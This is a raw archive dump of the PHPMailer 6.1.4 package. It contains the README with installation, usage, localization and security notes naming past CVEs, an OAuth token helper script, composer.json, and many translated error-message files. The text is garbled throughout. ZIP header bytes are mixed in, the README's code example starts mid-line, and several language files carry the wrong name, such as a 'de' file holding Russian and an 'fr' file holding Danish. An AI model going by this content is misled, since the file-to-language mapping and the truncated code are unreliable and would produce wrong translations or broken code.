[Composer](https://getcomposer.org) is the recommended way to install PHPMailer. Just add this line to your `composer.json` file: ```json "phpmailer/phpmailer": "~6.1" ``` or run ```sh composer require phpmailer/phpmailer ``` Note that the `vendor` folder and the `vendor/autoload.php` script are generated by Composer; they are not part of PHPMailer. If you want to use the Gmail XOAUTH2 authentication class, you will also need to add a dependency on the `league/oauth2-client` package in your `composer.json`. Alternatively, if you're not using Composer, copy the contents of the PHPMailer folder into one of the `include_path` directories specified in your PHP configuration and load each class file manually: ```php SMTPDebug = SMTP::DEBUG_SERVER; // Enable verbose debug output $mail->isSMTP(); // Send using SMTP $mail->Host = 'smtp1.example.com'; // Set the SMTP server to send through $mail->SMTPAuth = true; // Enable SMTP authentication $mail->Username = 'user@example.com'; // SMTP username $mail->Password = 'secret'; // SMTP password $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; // Enable TLS encryption; `PHPMailer::ENCRYPTION_SMTPS` also accepted $mail->Port = 587; // TCP port to connect to //Recipients $mail->setFrom('from@example.com', 'Mailer'); $mail->addAddress('joe@example.net', 'Joe User'); // Add a recipient $mail->addAddress('ellen@example.com'); // Name is optional $mail->addReplyTo('info@example.com', 'Information'); $mail->addCC('cc@example.com'); $mail->addBCC('bcc@example.com'); // Attachments $mail->addAttachment('/var/tmp/file.tar.gz'); // Add attachments $mail->addAttachment('/tmp/image.jpg', 'new.jpg'); // Optional name // Content $mail->isHTML(true); // Set email format to HTML $mail->Subject = 'Here is the subject'; $mail->Body = 'This is the HTML message body in bold!'; $mail->AltBody = 'This is the body in plain text for non-HTML mail clients'; $mail->send(); echo 'Message has been sent'; } catch (Exception $e) { echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; } ``` You'll find plenty more to play with in the [examples](https://github.com/PHPMailer/PHPMailer/tree/master/examples) folder. If you are re-using the instance (e.g. when sending to a mailing list), you may need to clear the recipient list to avoid sending duplicate messages. See [the mailing list example](https://github.com/PHPMailer/PHPMailer/blob/master/examples/mailing_list.phps) for further guidance. That's it. You should now be ready to use PHPMailer! ## Localization PHPMailer defaults to English, but in the [language](https://github.com/PHPMailer/PHPMailer/tree/master/language/) folder you'll find many translations for PHPMailer error messages that you may encounter. Their filenames contain [ISO 639-1](http://en.wikipedia.org/wiki/ISO_639-1) language code for the translations, for example `fr` for French. To specify a language, you need to tell PHPMailer which one to use, like this: ```php // To load the French version $mail->setLanguage('fr', '/optional/path/to/language/directory/'); ``` We welcome corrections and new languages - if you're looking for corrections to do, run the [PHPMailerLangTest.php](https://github.com/PHPMailer/PHPMailer/tree/master/test/PHPMailerLangTest.php) script in the tests folder and it will show any missing translations. ## Documentation Start reading at the [GitHub wiki](https://github.com/PHPMailer/PHPMailer/wiki). If you're having trouble, this should be the first place you look as it's the most frequently updated. Examples of how to use PHPMailer for common scenarios can be found in the [examples](https://github.com/PHPMailer/PHPMailer/tree/master/examples) folder. If you're looking for a good starting point, we recommend you start with [the Gmail example](https://github.com/PHPMailer/PHPMailer/tree/master/examples/gmail.phps). Note that in order to reduce PHPMailer's deployed code footprint, the examples are no longer included if you load PHPMailer via Composer or via [GitHub's zip file download](https://github.com/PHPMailer/PHPMailer/archive/master.zip), so you'll need to either clone the git repository or use the above links to get to the examples directly. Complete generated API documentation is [available online](http://phpmailer.github.io/PHPMailer/). You can generate complete API-level documentation by running `phpdoc` in the top-level folder, and documentation will appear in the `docs` folder, though you'll need to have [PHPDocumentor](http://www.phpdoc.org) installed. You may find [the unit tests](https://github.com/PHPMailer/PHPMailer/tree/master/test/phpmailerTest.php) a good source of how to do various operations such as encryption. If the documentation doesn't cover what you need, search the [many questions on Stack Overflow](http://stackoverflow.com/questions/tagged/phpmailer), and before you ask a question about "SMTP Error: Could not connect to SMTP host.", [read the troubleshooting guide](https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting). ## Tests There is a PHPUnit test script in the [test](https://github.com/PHPMailer/PHPMailer/tree/master/test/) folder. PHPMailer uses PHPUnit 4.8 - we would use 5.x but we need to run on PHP 5.5. Build status: [![Build Status](https://travis-ci.org/PHPMailer/PHPMailer.svg)](https://travis-ci.org/PHPMailer/PHPMailer) If this isn't passing, is there something you can do to help? ## Security Please disclose any vulnerabilities found responsibly - report any security problems found to the maintainers privately. PHPMailer versions prior to 5.2.22 (released January 9th 2017) have a local file disclosure vulnerability, [CVE-2017-5223](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5223). If content passed into `msgHTML()` is sourced from unfiltered user input, relative paths can map to absolute local file paths and added as attachments. Also note that `addAttachment` (just like `file_get_contents`, `passthru`, `unlink`, etc) should not be passed user-sourced params either! Reported by Yongxiang Li of Asiasecurity. PHPMailer versions prior to 5.2.20 (released December 28th 2016) are vulnerable to [CVE-2016-10045](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10045) a remote code execution vulnerability, responsibly reported by [Dawid Golunski](https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html), and patched by Paul Buonopane (@Zenexer). PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10033) a critical remote code execution vulnerability, responsibly reported by [Dawid Golunski](http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html). See [SECURITY](https://github.com/PHPMailer/PHPMailer/tree/master/SECURITY.md) for more detail on security issues. ## Contributing Please submit bug reports, suggestions and pull requests to the [GitHub issue tracker](https://github.com/PHPMailer/PHPMailer/issues). We're particularly interested in fixing edge-cases, expanding test coverage and updating translations. If you found a mistake in the docs, or want to add something, go ahead and amend the wiki - anyone can edit it. If you have git clones from prior to the move to the PHPMailer GitHub organisation, you'll need to update any remote URLs referencing the old GitHub location with a command like this from within your clone: ```sh git remote set-url upstream https://github.com/PHPMailer/PHPMailer.git ``` Please *don't* use the SourceForge or Google Code projects any more; they are obsolete and no longer maintained. ## Sponsorship Development time and resources for PHPMailer are provided by [Smartmessages.net](https://info.smartmessages.net/), a powerful email marketing system. Smartmessages email marketing Other contributions are gladly received, whether in beer 🍺, T-shirts 👕, Amazon wishlist raids, or cold, hard cash 💰. If you'd like to donate to say "thank you" to maintainers or contributors, please contact them through individual profile pages via [the contributors page](https://github.com/PHPMailer/PHPMailer/graphs/contributors). ## Changelog See [changelog](changelog.md). ## History - PHPMailer was originally written in 2001 by Brent R. Matzelle as a [SourceForge project](http://sourceforge.net/projects/phpmailer/). - Marcus Bointon (coolbru on SF) and Andy Prevost (codeworxtech) took over the project in 2004. - Became an Apache incubator project on Google Code in 2010, managed by Jim Jagielski. - Marcus created his fork on [GitHub](https://github.com/Synchro/PHPMailer) in 2008. - Jim and Marcus decide to join forces and use GitHub as the canonical and official repo for PHPMailer in 2013. - PHPMailer moves to the [PHPMailer organisation](https://github.com/PHPMailer) on GitHub in 2013. ### What's changed since moving from SourceForge? - Official successor to the SourceForge and Google Code projects. - Test suite. - Continuous integration with Travis-CI. - Composer support. - Public development. - Additional languages and language strings. - CRAM-MD5 authentication support. - Preserves full repo history of authors, commits and branches from the original SourceForge project. PK@fZ0w*'phpmailer/phpmailer/get_oauth_token.phpnu[ * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2017 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ /** * Get an OAuth2 token from an OAuth2 provider. * * Install this script on your server so that it's accessible * as [https/http]:////get_oauth_token.php * e.g.: http://localhost/phpmailer/get_oauth_token.php * * Ensure dependencies are installed with 'composer install' * * Set up an app in your Google/Yahoo/Microsoft account * * Set the script address as the app's redirect URL * If no refresh token is obtained when running this file, * revoke access to your app and run the script again. */ namespace PHPMailer\PHPMailer; /** * Aliases for League Provider Classes * Make sure you have added these to your composer.json and run `composer install` * Plenty to choose from here: * @see http://oauth2-client.thephpleague.com/providers/thirdparty/ */ // @see https://github.com/thephpleague/oauth2-google use League\OAuth2\Client\Provider\Google; // @see https://packagist.org/packages/hayageek/oauth2-yahoo use Hayageek\OAuth2\Client\Provider\Yahoo; // @see https://github.com/stevenmaguire/oauth2-microsoft use Stevenmaguire\OAuth2\Client\Provider\Microsoft; if (!isset($_GET['code']) && !isset($_GET['provider'])) { ?> Select Provider:
Google
Yahoo
Microsoft/Outlook/Hotmail/Live/Office365
$clientId, 'clientSecret' => $clientSecret, 'redirectUri' => $redirectUri, 'accessType' => 'offline' ]; $options = []; $provider = null; switch ($providerName) { case 'Google': $provider = new Google($params); $options = [ 'scope' => [ 'https://mail.google.com/' ] ]; break; case 'Yahoo': $provider = new Yahoo($params); break; case 'Microsoft': $provider = new Microsoft($params); $options = [ 'scope' => [ 'wl.imap', 'wl.offline_access' ] ]; break; } if (null === $provider) { exit('Provider missing'); } if (!isset($_GET['code'])) { // If we don't have an authorization code then get one $authUrl = $provider->getAuthorizationUrl($options); $_SESSION['oauth2state'] = $provider->getState(); header('Location: ' . $authUrl); exit; // Check given state against previously stored one to mitigate CSRF attack } elseif (empty($_GET['state']) || ($_GET['state'] !== $_SESSION['oauth2state'])) { unset($_SESSION['oauth2state']); unset($_SESSION['provider']); exit('Invalid state'); } else { unset($_SESSION['provider']); // Try to get an access token (using the authorization code grant) $token = $provider->getAccessToken( 'authorization_code', [ 'code' => $_GET['code'] ] ); // Use this to interact with an API on the users behalf // Use this to get a new access token if the old one expires echo 'Refresh Token: ', $token->getRefreshToken(); } PK@fZphpmailer/phpmailer/VERSIONnu[6.1.4PK@fZO04!phpmailer/phpmailer/composer.jsonnu[{ "name": "phpmailer/phpmailer", "type": "library", "description": "PHPMailer is a full-featured email creation and transfer class for PHP", "authors": [ { "name": "Marcus Bointon", "email": "phpmailer@synchromedia.co.uk" }, { "name": "Jim Jagielski", "email": "jimjag@gmail.com" }, { "name": "Andy Prevost", "email": "codeworxtech@users.sourceforge.net" }, { "name": "Brent R. Matzelle" } ], "require": { "php": ">=5.5.0", "ext-ctype": "*", "ext-filter": "*" }, "require-dev": { "friendsofphp/php-cs-fixer": "^2.2", "phpunit/phpunit": "^4.8 || ^5.7", "doctrine/annotations": "^1.2" }, "suggest": { "psr/log": "For optional PSR-3 debug logging", "league/oauth2-google": "Needed for Google XOAUTH2 authentication", "hayageek/oauth2-yahoo": "Needed for Yahoo XOAUTH2 authentication", "stevenmaguire/oauth2-microsoft": "Needed for Microsoft XOAUTH2 authentication", "ext-mbstring": "Needed to send email in multibyte encoding charset", "symfony/polyfill-mbstring": "To support UTF-8 if the Mbstring PHP extension is not enabled (^1.2)" }, "autoload": { "psr-4": { "PHPMailer\\PHPMailer\\": "src/" } }, "autoload-dev": { "psr-4": { "PHPMailer\\Test\\": "test/" } }, "license": "LGPL-2.1-only" } PK@fZ<(C C 2phpmailer/phpmailer/language/phpmailer.lang-ka.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP შეცდომა: ავტორიზაცია შეუძლებელია.'; $PHPMAILER_LANG['connect_host'] = 'SMTP შეცდომა: SMTP სერვერთან დაკავშირება შეუძლებელია.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP შეცდომა: მონაცემები არ იქნა მიღებული.'; $PHPMAILER_LANG['encoding'] = 'კოდირების უცნობი ტიპი: '; $PHPMAILER_LANG['execute'] = 'შეუძლებელია შემდეგი ბრძანების შესრულება: '; $PHPMAILER_LANG['file_access'] = 'შეუძლებელია წვდომა ფაილთან: '; $PHPMAILER_LANG['file_open'] = 'ფაილური სისტემის შეცდომა: არ იხსნება ფაილი: '; $PHPMAILER_LANG['from_failed'] = 'გამგზავნის არასწორი მისამართი: '; $PHPMAILER_LANG['instantiate'] = 'mail ფუნქციის გაშვება ვერ ხერხდება.'; $PHPMAILER_LANG['provide_address'] = 'გთხოვთ მიუთითოთ ერთი ადრესატის e-mail მისამართი მაინც.'; $PHPMAILER_LANG['mailer_not_supported'] = ' - საფოსტო სერვერის მხარდაჭერა არ არის.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP შეცდომა: შემდეგ მისამართებზე გაგზავნა ვერ მოხერხდა: '; $PHPMAILER_LANG['empty_message'] = 'შეტყობინება ცარიელია'; $PHPMAILER_LANG['invalid_address'] = 'არ გაიგზავნა, e-mail მისამართის არასწორი ფორმატი: '; $PHPMAILER_LANG['signing'] = 'ხელმოწერის შეცდომა: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'შეცდომა SMTP სერვერთან დაკავშირებისას'; $PHPMAILER_LANG['smtp_error'] = 'SMTP სერვერის შეცდომა: '; $PHPMAILER_LANG['variable_set'] = 'შეუძლებელია შემდეგი ცვლადის შექმნა ან შეცვლა: '; $PHPMAILER_LANG['extension_missing'] = 'ბიბლიოთეკა არ არსებობს: '; PK@fZ2phpmailer/phpmailer/language/phpmailer.lang-de.phpnu[ * @author Foster Snowhill */ $PHPMAILER_LANG['authenticate'] = 'Ошибка SMTP: ошибка авторизации.'; $PHPMAILER_LANG['connect_host'] = 'Ошибка SMTP: не удается подключиться к SMTP-серверу.'; $PHPMAILER_LANG['data_not_accepted'] = 'Ошибка SMTP: данные не приняты.'; $PHPMAILER_LANG['encoding'] = 'Неизвестная кодировка: '; $PHPMAILER_LANG['execute'] = 'Невозможно выполнить команду: '; $PHPMAILER_LANG['file_access'] = 'Нет доступа к файлу: '; $PHPMAILER_LANG['file_open'] = 'Файловая ошибка: не удаётся открыть файл: '; $PHPMAILER_LANG['from_failed'] = 'Неверный адрес отправителя: '; $PHPMAILER_LANG['instantiate'] = 'Невозможно запустить функцию mail().'; $PHPMAILER_LANG['provide_address'] = 'Пожалуйста, введите хотя бы один email-адрес получателя.'; $PHPMAILER_LANG['mailer_not_supported'] = ' — почтовый сервер не поддерживается.'; $PHPMAILER_LANG['recipients_failed'] = 'Ошибка SMTP: не удалась отправка таким адресатам: '; $PHPMAILER_LANG['empty_message'] = 'Пустое сообщение'; $PHPMAILER_LANG['invalid_address'] = 'Не отправлено из-за неправильного формата email-адреса: '; $PHPMAILER_LANG['signing'] = 'Ошибка подписи: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ошибка соединения с SMTP-сервером'; $PHPMAILER_LANG['smtp_error'] = 'Ошибка SMTP-сервера: '; $PHPMAILER_LANG['variable_set'] = 'Невозможно установить или сбросить переменную: '; $PHPMAILER_LANG['extension_missing'] = 'Расширение отсутствует: '; PK@fZt2phpmailer/phpmailer/language/phpmailer.lang-ms.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Ralat SMTP: Tidak dapat pengesahan.'; $PHPMAILER_LANG['connect_host'] = 'Ralat SMTP: Tidak dapat menghubungi hos pelayan SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Ralat SMTP: Data tidak diterima oleh pelayan.'; $PHPMAILER_LANG['empty_message'] = 'Tiada isi untuk mesej'; $PHPMAILER_LANG['encoding'] = 'Pengekodan tidak diketahui: '; $PHPMAILER_LANG['execute'] = 'Tidak dapat melaksanakan: '; $PHPMAILER_LANG['file_access'] = 'Tidak dapat mengakses fail: '; $PHPMAILER_LANG['file_open'] = 'Ralat Fail: Tidak dapat membuka fail: '; $PHPMAILER_LANG['from_failed'] = 'Berikut merupakan ralat dari alamat e-mel: '; $PHPMAILER_LANG['instantiate'] = 'Tidak dapat memberi contoh fungsi e-mel.'; $PHPMAILER_LANG['invalid_address'] = 'Alamat emel tidak sah: '; $PHPMAILER_LANG['mailer_not_supported'] = ' jenis penghantar emel tidak disokong.'; $PHPMAILER_LANG['provide_address'] = 'Anda perlu menyediakan sekurang-kurangnya satu alamat e-mel penerima.'; $PHPMAILER_LANG['recipients_failed'] = 'Ralat SMTP: Penerima e-mel berikut telah gagal: '; $PHPMAILER_LANG['signing'] = 'Ralat pada tanda tangan: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() telah gagal.'; $PHPMAILER_LANG['smtp_error'] = 'Ralat pada pelayan SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Tidak boleh menetapkan atau menetapkan semula pembolehubah: '; $PHPMAILER_LANG['extension_missing'] = 'Sambungan hilang: '; PK@fZd312phpmailer/phpmailer/language/phpmailer.lang-sr.phpnu[ * @author Miloš Milanović */ $PHPMAILER_LANG['authenticate'] = 'SMTP грешка: аутентификација није успела.'; $PHPMAILER_LANG['connect_host'] = 'SMTP грешка: повезивање са SMTP сервером није успело.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP грешка: подаци нису прихваћени.'; $PHPMAILER_LANG['empty_message'] = 'Садржај поруке је празан.'; $PHPMAILER_LANG['encoding'] = 'Непознато кодирање: '; $PHPMAILER_LANG['execute'] = 'Није могуће извршити наредбу: '; $PHPMAILER_LANG['file_access'] = 'Није могуће приступити датотеци: '; $PHPMAILER_LANG['file_open'] = 'Није могуће отворити датотеку: '; $PHPMAILER_LANG['from_failed'] = 'SMTP грешка: слање са следећих адреса није успело: '; $PHPMAILER_LANG['recipients_failed'] = 'SMTP грешка: слање на следеће адресе није успело: '; $PHPMAILER_LANG['instantiate'] = 'Није могуће покренути mail функцију.'; $PHPMAILER_LANG['invalid_address'] = 'Порука није послата. Неисправна адреса: '; $PHPMAILER_LANG['mailer_not_supported'] = ' мејлер није подржан.'; $PHPMAILER_LANG['provide_address'] = 'Дефинишите бар једну адресу примаоца.'; $PHPMAILER_LANG['signing'] = 'Грешка приликом пријаве: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Повезивање са SMTP сервером није успело.'; $PHPMAILER_LANG['smtp_error'] = 'Грешка SMTP сервера: '; $PHPMAILER_LANG['variable_set'] = 'Није могуће задати нити ресетовати променљиву: '; $PHPMAILER_LANG['extension_missing'] = 'Недостаје проширење: '; PK@fZO2phpmailer/phpmailer/language/phpmailer.lang-pl.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP Greška: Neuspjela autentikacija.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Greška: Ne mogu se spojiti na SMTP poslužitelj.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Greška: Podatci nisu prihvaćeni.'; $PHPMAILER_LANG['empty_message'] = 'Sadržaj poruke je prazan.'; $PHPMAILER_LANG['encoding'] = 'Nepoznati encoding: '; $PHPMAILER_LANG['execute'] = 'Nije moguće izvršiti naredbu: '; $PHPMAILER_LANG['file_access'] = 'Nije moguće pristupiti datoteci: '; $PHPMAILER_LANG['file_open'] = 'Nije moguće otvoriti datoteku: '; $PHPMAILER_LANG['from_failed'] = 'SMTP Greška: Slanje s navedenih e-mail adresa nije uspjelo: '; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Greška: Slanje na navedenih e-mail adresa nije uspjelo: '; $PHPMAILER_LANG['instantiate'] = 'Ne mogu pokrenuti mail funkcionalnost.'; $PHPMAILER_LANG['invalid_address'] = 'E-mail nije poslan. Neispravna e-mail adresa: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer nije podržan.'; $PHPMAILER_LANG['provide_address'] = 'Definirajte barem jednu adresu primatelja.'; $PHPMAILER_LANG['signing'] = 'Greška prilikom prijave: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Spajanje na SMTP poslužitelj nije uspjelo.'; $PHPMAILER_LANG['smtp_error'] = 'Greška SMTP poslužitelja: '; $PHPMAILER_LANG['variable_set'] = 'Ne mogu postaviti varijablu niti ju vratiti nazad: '; $PHPMAILER_LANG['extension_missing'] = 'Nedostaje proširenje: '; PK@fZLdd2phpmailer/phpmailer/language/phpmailer.lang-fo.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP feilur: Kundi ikki góðkenna.'; $PHPMAILER_LANG['connect_host'] = 'SMTP feilur: Kundi ikki knýta samband við SMTP vert.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP feilur: Data ikki góðkent.'; //$PHPMAILER_LANG['empty_message'] = 'Message body empty'; $PHPMAILER_LANG['encoding'] = 'Ókend encoding: '; $PHPMAILER_LANG['execute'] = 'Kundi ikki útføra: '; $PHPMAILER_LANG['file_access'] = 'Kundi ikki tilganga fílu: '; $PHPMAILER_LANG['file_open'] = 'Fílu feilur: Kundi ikki opna fílu: '; $PHPMAILER_LANG['from_failed'] = 'fylgjandi Frá/From adressa miseydnaðist: '; $PHPMAILER_LANG['instantiate'] = 'Kuni ikki instantiera mail funktión.'; //$PHPMAILER_LANG['invalid_address'] = 'Invalid address: '; $PHPMAILER_LANG['mailer_not_supported'] = ' er ikki supporterað.'; $PHPMAILER_LANG['provide_address'] = 'Tú skal uppgeva minst móttakara-emailadressu(r).'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Feilur: Fylgjandi móttakarar miseydnaðust: '; //$PHPMAILER_LANG['signing'] = 'Signing Error: '; //$PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() failed.'; //$PHPMAILER_LANG['smtp_error'] = 'SMTP server error: '; //$PHPMAILER_LANG['variable_set'] = 'Cannot set or reset variable: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZjq2phpmailer/phpmailer/language/phpmailer.lang-bg.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP грешка: Не може да се удостовери пред сървъра.'; $PHPMAILER_LANG['connect_host'] = 'SMTP грешка: Не може да се свърже с SMTP хоста.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP грешка: данните не са приети.'; $PHPMAILER_LANG['empty_message'] = 'Съдържанието на съобщението е празно'; $PHPMAILER_LANG['encoding'] = 'Неизвестно кодиране: '; $PHPMAILER_LANG['execute'] = 'Не може да се изпълни: '; $PHPMAILER_LANG['file_access'] = 'Няма достъп до файл: '; $PHPMAILER_LANG['file_open'] = 'Файлова грешка: Не може да се отвори файл: '; $PHPMAILER_LANG['from_failed'] = 'Следните адреси за подател са невалидни: '; $PHPMAILER_LANG['instantiate'] = 'Не може да се инстанцира функцията mail.'; $PHPMAILER_LANG['invalid_address'] = 'Невалиден адрес: '; $PHPMAILER_LANG['mailer_not_supported'] = ' - пощенски сървър не се поддържа.'; $PHPMAILER_LANG['provide_address'] = 'Трябва да предоставите поне един email адрес за получател.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP грешка: Следните адреси за Получател са невалидни: '; $PHPMAILER_LANG['signing'] = 'Грешка при подписване: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP провален connect().'; $PHPMAILER_LANG['smtp_error'] = 'SMTP сървърна грешка: '; $PHPMAILER_LANG['variable_set'] = 'Не може да се установи или възстанови променлива: '; $PHPMAILER_LANG['extension_missing'] = 'Липсва разширение: '; PK@fZ=ZX//2phpmailer/phpmailer/language/phpmailer.lang-af.phpnu[ * @author young * @author Teddysun */ $PHPMAILER_LANG['authenticate'] = 'SMTP 错误:登录失败。'; $PHPMAILER_LANG['connect_host'] = 'SMTP 错误:无法连接到 SMTP 主机。'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP 错误:数据不被接受。'; $PHPMAILER_LANG['empty_message'] = '邮件正文为空。'; $PHPMAILER_LANG['encoding'] = '未知编码:'; $PHPMAILER_LANG['execute'] = '无法执行:'; $PHPMAILER_LANG['file_access'] = '无法访问文件:'; $PHPMAILER_LANG['file_open'] = '文件错误:无法打开文件:'; $PHPMAILER_LANG['from_failed'] = '发送地址错误:'; $PHPMAILER_LANG['instantiate'] = '未知函数调用。'; $PHPMAILER_LANG['invalid_address'] = '发送失败,电子邮箱地址是无效的:'; $PHPMAILER_LANG['mailer_not_supported'] = '发信客户端不被支持。'; $PHPMAILER_LANG['provide_address'] = '必须提供至少一个收件人地址。'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP 错误:收件人地址错误:'; $PHPMAILER_LANG['signing'] = '登录失败:'; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP服务器连接失败。'; $PHPMAILER_LANG['smtp_error'] = 'SMTP服务器出错:'; $PHPMAILER_LANG['variable_set'] = '无法设置或重置变量:'; $PHPMAILER_LANG['extension_missing'] = '丢失模块 Extension:'; PK@fZGe2phpmailer/phpmailer/language/phpmailer.lang-fa.phpnu[ * @author Mohammad Hossein Mojtahedi */ $PHPMAILER_LANG['authenticate'] = 'خطای SMTP: احراز هویت با شکست مواجه شد.'; $PHPMAILER_LANG['connect_host'] = 'خطای SMTP: اتصال به سرور SMTP برقرار نشد.'; $PHPMAILER_LANG['data_not_accepted'] = 'خطای SMTP: داده‌ها نا‌درست هستند.'; $PHPMAILER_LANG['empty_message'] = 'بخش متن پیام خالی است.'; $PHPMAILER_LANG['encoding'] = 'کد‌گذاری نا‌شناخته: '; $PHPMAILER_LANG['execute'] = 'امکان اجرا وجود ندارد: '; $PHPMAILER_LANG['file_access'] = 'امکان دسترسی به فایل وجود ندارد: '; $PHPMAILER_LANG['file_open'] = 'خطای File: امکان بازکردن فایل وجود ندارد: '; $PHPMAILER_LANG['from_failed'] = 'آدرس فرستنده اشتباه است: '; $PHPMAILER_LANG['instantiate'] = 'امکان معرفی تابع ایمیل وجود ندارد.'; $PHPMAILER_LANG['invalid_address'] = 'آدرس ایمیل معتبر نیست: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer پشتیبانی نمی‌شود.'; $PHPMAILER_LANG['provide_address'] = 'باید حداقل یک آدرس گیرنده وارد کنید.'; $PHPMAILER_LANG['recipients_failed'] = 'خطای SMTP: ارسال به آدرس گیرنده با خطا مواجه شد: '; $PHPMAILER_LANG['signing'] = 'خطا در امضا: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'خطا در اتصال به SMTP.'; $PHPMAILER_LANG['smtp_error'] = 'خطا در SMTP Server: '; $PHPMAILER_LANG['variable_set'] = 'امکان ارسال یا ارسال مجدد متغیر‌ها وجود ندارد: '; $PHPMAILER_LANG['extension_missing'] = 'افزونه موجود نیست: '; PK@fZ2phpmailer/phpmailer/language/phpmailer.lang-tl.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP Error: Hindi mapatotohanan.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Hindi makakonekta sa SMTP host.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Error: Ang datos ay hindi maaaring matatanggap.'; $PHPMAILER_LANG['empty_message'] = 'Walang laman ang mensahe'; $PHPMAILER_LANG['encoding'] = 'Hindi alam ang encoding: '; $PHPMAILER_LANG['execute'] = 'Hindi maisasagawa: '; $PHPMAILER_LANG['file_access'] = 'Hindi ma-access ang file: '; $PHPMAILER_LANG['file_open'] = 'Hindi mabuksan ang file: '; $PHPMAILER_LANG['from_failed'] = 'Ang sumusunod na address ay nabigo: '; $PHPMAILER_LANG['instantiate'] = 'Hindi maaaring magbigay ng institusyon ang mail'; $PHPMAILER_LANG['invalid_address'] = 'Hindi wasto ang address na naibigay: '; $PHPMAILER_LANG['mailer_not_supported'] = 'Ang mailer ay hindi suportado'; $PHPMAILER_LANG['provide_address'] = 'Kailangan mong magbigay ng kahit isang email address na tatanggap'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: Ang mga sumusunod na tatanggap ay nabigo: '; $PHPMAILER_LANG['signing'] = 'Hindi ma-sign'; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ang SMTP connect() ay nabigo'; $PHPMAILER_LANG['smtp_error'] = 'Ang server ng SMTP ay nabigo'; $PHPMAILER_LANG['variable_set'] = 'Hindi matatakda ang mga variables: '; $PHPMAILER_LANG['extension_missing'] = 'Nawawala ang extension'; PK@fZi2phpmailer/phpmailer/language/phpmailer.lang-fi.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'Error SMTP: No s’ha pogut autenticar.'; $PHPMAILER_LANG['connect_host'] = 'Error SMTP: No es pot connectar al servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Error SMTP: Dades no acceptades.'; $PHPMAILER_LANG['empty_message'] = 'El cos del missatge està buit.'; $PHPMAILER_LANG['encoding'] = 'Codificació desconeguda: '; $PHPMAILER_LANG['execute'] = 'No es pot executar: '; $PHPMAILER_LANG['file_access'] = 'No es pot accedir a l’arxiu: '; $PHPMAILER_LANG['file_open'] = 'Error d’Arxiu: No es pot obrir l’arxiu: '; $PHPMAILER_LANG['from_failed'] = 'La(s) següent(s) adreces de remitent han fallat: '; $PHPMAILER_LANG['instantiate'] = 'No s’ha pogut crear una instància de la funció Mail.'; $PHPMAILER_LANG['invalid_address'] = 'Adreça d’email invalida: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer no està suportat'; $PHPMAILER_LANG['provide_address'] = 'S’ha de proveir almenys una adreça d’email com a destinatari.'; $PHPMAILER_LANG['recipients_failed'] = 'Error SMTP: Els següents destinataris han fallat: '; $PHPMAILER_LANG['signing'] = 'Error al signar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ha fallat el SMTP Connect().'; $PHPMAILER_LANG['smtp_error'] = 'Error del servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'No s’ha pogut establir o restablir la variable: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PK@fZ"Z"2phpmailer/phpmailer/language/phpmailer.lang-fr.phpnu[ */ $PHPMAILER_LANG['authenticate'] = 'SMTP fejl: Kunne ikke logge på.'; $PHPMAILER_LANG['connect_host'] = 'SMTP fejl: Kunne ikke tilslutte SMTP serveren.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP fejl: Data kunne ikke accepteres.'; 